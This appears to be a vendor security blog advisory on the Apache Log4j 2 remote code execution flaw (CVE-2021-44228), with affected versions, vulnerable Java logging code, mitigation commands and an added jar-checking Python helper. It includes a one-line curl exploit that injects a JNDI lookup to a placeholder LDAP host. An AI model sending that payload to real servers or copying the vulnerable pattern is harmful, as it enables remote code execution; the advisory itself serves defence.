[Urgent] Apache Log4j 2 Vulnerability (CVE-2021-44228), Update Recommended

The Apache Log4j 2 vulnerability (CVE-2021-44228) was disclosed on Twitter and GitHub, together with a proof of concept (PoC), on December 10th, 2021. It is a remote code execution (RCE) vulnerability in the Log4j library: a log message can carry the address of a remote Java object, and the vulnerable server fetches and executes that object. Alibaba's cloud security team first reported the vulnerability to the Apache Software Foundation on November 24th, 2021, and the first patch was released on December 6th, 2021.

1. Vulnerability Targets and Versions

Products that meet the following condition are affected by the vulnerability.

  • All Apache Log4j 2 versions from 2.0-beta9 to 2.14.1

2. Method for Vulnerability Exploitation

If a service using Log4j contains code that writes the string received in the User-Agent header to its logs, the following exploitation is possible.

[Part of server source code]

static Logger log = LogManager.getLogger(VulnerableLog4jExampleHandler.class.getName());
...
// The User-Agent header value is entirely controlled by the client
String userAgent = he.getRequestHeader("user-agent");
String response = "<h1>Hello There, " + userAgent + "!</h1>";
// The untrusted string is passed to Log4j, which evaluates ${...} lookups (including jndi) inside it
log.error("Request User Agent:{}", userAgent);
...

[Vulnerability Exploitation]

An attack that makes the server automatically execute the Java object located at xxx.xxx.xxx.xxx/a
ex) # curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://xxx.xxx.xxx.xxx/a}'

3. Response to Vulnerability

1) Applying the patch is recommended for all Log4j versions from 2.0-beta9 to 2.14.1

2) Mitigation methods if the Log4j patch is difficult to apply (see ATIP Security Recommendations)

  • Version: 2.0-beta9 – 2.10.0
    Remove the JndiLookup class from the jar as shown below.
    # zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

  • Version: 2.10 – 2.14.1
    Set the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to TRUE
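Added example (not part of the advisory or of AhnLab's tooling): checks a log4j-core jar against the version range in section 1 and reports whether the JndiLookup class removal from section 3 has been applied, and performs that removal the same way the zip command above does. It assumes the jar carries its Maven pom.properties entry for the version; the sample jar is constructed with dummy class bytes.

```python
import io
import re
import zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
AFFECTED = ((2, 0, 0), (2, 14, 1))  # 2.0-beta9 .. 2.14.1, per the advisory

def parse_version(text):
    """'2.14.1' -> ((2, 14, 1), None); '2.0-beta9' -> ((2, 0, 0), ('beta', 9))."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-([a-z]+)(\d+))?$", text)
    if not m:
        raise ValueError("unrecognised log4j version: %r" % text)
    nums = (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))
    return nums, ((m.group(4), int(m.group(5))) if m.group(4) else None)

def classify(jar_bytes):
    """'vulnerable': affected version with JndiLookup present; 'mitigated': class removed."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        names = zf.namelist()
        props = zf.read(POM_PROPS).decode() if POM_PROPS in names else ""
    m = re.search(r"^version=(\S+)", props, re.M)
    if not m:
        return "unknown"
    nums, pre = parse_version(m.group(1))
    in_range = AFFECTED[0] <= nums <= AFFECTED[1]
    if pre and pre[0] == "beta" and nums == (2, 0, 0) and pre[1] < 9:
        in_range = False  # betas before 2.0-beta9 fall outside the advisory range
    if not in_range:
        return "not_affected"
    return "vulnerable" if JNDI_CLASS in names else "mitigated"

def remove_jndi_lookup(jar_bytes):
    """Same effect as the advisory's zip -d command: rewrite the jar without JndiLookup."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as src, zipfile.ZipFile(out, "w") as dst:
        for item in src.infolist():
            if item.filename != JNDI_CLASS:
                dst.writestr(item, src.read(item.filename))
    return out.getvalue()

def make_sample_jar(version, include_jndi=True):
    """Constructed stand-in for a log4j-core jar (class bodies are dummy bytes)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, "version=%s\nartifactId=log4j-core\n" % version)
        if include_jndi:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")
    return buf.getvalue()
```

On a real host, read the jar from disk with open(path, "rb").read(), pass it to classify(), and write the result of remove_jndi_lookup() back only for the 2.0-beta9 to 2.10.0 range where the advisory prescribes class removal.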

4. AhnLab Products Response Status

AhnLab can detect the vulnerability with TG/IPX, AIPS, and HIPS products.

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

Reference 1) https://www.boho.or.kr/data/secNoticeView.do?bulletin_writing_sequence=36389
Reference 2) https://atip.ahnlab.com/ti/contents/security-advisory?i=0a053796-66db-4ce0-9c30-d3c19060670e

The post [Urgent] Apache Log4j 2 Vulnerability (CVE-2021-44228), Update Recommended appeared first on ASEC BLOG.

Article Link: [Alert] Apache Log4j 2 Vulnerability (CVE-2021-44228), Update Recommended - ASEC BLOG